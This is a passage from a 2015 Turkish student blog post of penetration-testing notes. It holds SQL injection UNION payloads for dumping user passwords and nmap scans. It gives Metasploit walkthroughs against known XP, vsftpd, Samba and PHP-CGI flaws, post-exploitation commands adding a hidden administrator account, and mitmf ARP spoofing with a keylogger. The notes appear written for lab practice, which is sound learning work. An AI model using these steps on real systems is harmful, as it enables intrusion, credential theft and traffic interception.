ben

OMÜ , Bilgisayar Mühendisliği, 13'

24 Ağustos 2015 Pazartesi

güvenlik


php web servis üzerine çalişan ve web site üzerinden  olası açıklari öğreten bi kaynak. bunun için xampp servisi indirip kurun.

servisi başlatın: $ sudo /opt/lampp/lamp start
browser: http://127.0.0.1/dvwa/index.html

kullanıcı: admin
sifre: password1




- md5-cracker= sifreleri kıran aynı zamanda veritabanına ekleyen site

SQL Injection

- mysql zaafiyeti tum tablo bilgileri information_schema tablosunda tutulur.

web sitesinde bir kişi yada bir alan sorgulandiğinda url adresi /id=1 gibi bi değerle biriyorsa sql injectionla veritabanındaki diğer değerlere erişilebilir

sorgulama alanına giden değer örneğin öğrenci numarasıysa, formda ögrenci numarası alıyorsa, url adresi /no=123456 olarak bitiyorsa girilen alana aşağıdaki komutları yazarak vertabanı ile ilgili bilgilere ulaşmaya çalışalım

123456' union select 1,2,3  #

burda nodan sonra gelen ' sorguya devam etmemizi sağlar sonuna koyduğumuz # işareti ise gelen hataları yoksaymamızı sağlar

colon sayısını veritabanındaki colon sayısıyla eşitlememiz gerekiyor. veritabanında kac tane alan olduğunu bilmediğimiz için deneme-yanılma ile yazıyoruz. normal değer gelirse sayıyı tutturduk. 4 tane colon oldugunu yakaladık diyelim

1,2,3, column_name toplamlad 4 kolon

colon isimleri:

 123456' union select  1,2,3, column_name from information_shema.columns#

tablo isimleri:

 123456' union select  1,2,3, tables_name from information_shema.tables#

gelen tablolardan user_pwd tablosundan kullanıcı adı ve sifreleri alacağız

kullanıcı adı ve sifreleri:
 
 123456' union select  1,name,sifre,4  from user_pwd #

concat: web sitesinden gelen iki değer varsa bizde iki değer döndürebiliriz bunun için concatı kullanırız


                              Sızma Testi- Zaafiyetler

Lİnux-kali sürümü kullanılıyor

burbsuite internetteki trafiği takip eder.

$ burpsuite

Makine tespiti için  nmap = açık , çalışan  port tarama aracı

Belirli port:
$ nmap -sS -Pn -n -p80  

belirli aralıktaki iplerden sadece açık olanlar:
$ nmap -sS -Pn  -n --open 197.0.0.1/24 

- ctrl+x   , tarama hangi aşamada?

Xp üzerinde paylasımdan kaynaklanan zafiyet

$msfconsole
$search ms08-067

ms08-067 yukarıdaki acık portlarda bulduk, xp ait zafiyet kodu

$use exploit/windows/smb

bu yol bir üst komut sonucunda konsolda göründü, ordan aldık

$show options

istediği parametreler

$ set RHOST hedefmakine_ipsi

hedef makine ipsi nmap ile sorguladığımızda  zafiyetin sahip olduğu makineye ait ip adresini göstermiştik ordan aldık

$ check  sistemde zafiyet varmı?yokmu?

$ exploit   direk sisteme saldırır

 makine consolu ekranımızda
 
--> pwd
--> screenshot ekrangörüntüsü alır
--> run vnc   uzak masaüstü bağlantısı alır(arkada iz birakır)
--> shell    windows msdos consoluna düştük
--> net user esra /add.      yeni kullanıcı oluşturduk
--> net localgrup Administrator esra /add.   admin yetkisinde kullanıcı oluşturduk

ctrl+c     normal consol ekranına döndük

-->exit  makineden çıktık

ftp Zaafiyet

 $ nmap -sS -Pn  -n --open sV 197.0.0.1/24 
Çalışan servisleri versiyonlarıyla birlikte getirir.

listeden ftp 2.3.4 versiyonunu görduk. bu versiyonda zafiyet var

$msfconsol
$search msftpd

      sadece ftp komutları çalışır, dosya yükleme,transfer, dosya içeriğini değiştirme 
 
$use  msftpd_den_gelen_path
      exploit le başlayan arama sonucunda gelen path 

$show option   
$set RHOST ip_adress
$check
     modül desteklemiyor 
$ run
$exit makinede çıkar
 

 Samba dosya paylaşımından kaynaklanana zafiyet

direk makineye girer

$ search usermap-script
$ use user_map_scritten_gelen_path
$ show option
$ set RHOST  ip_adress
$ check/run

 --> id rootsa herişlemi yapabilir

$exit


vnc zaafiyeti 

vnc  uzak masaüstü bağlanma programı

$vncvlewer ip:5900
5900 bu programın kullandığı port

$password şifreyi gir


php zaafiyeti

$ mtfconsol
$ search
$ use php_cgi_arg_injection
$ show option
$ set RHOST ip_adress
$ run
-->id
$exit


mitmf: ağdaki veri trafiğini izler ,(!, iz bırakır)

$mitmf --arp --spoof -i vlan0 --gateway 192.168.121.1 --jskeylogger

$mitmf --arp --spoof -i vlan0 --gateway 192.168.1.1 --jskeylogger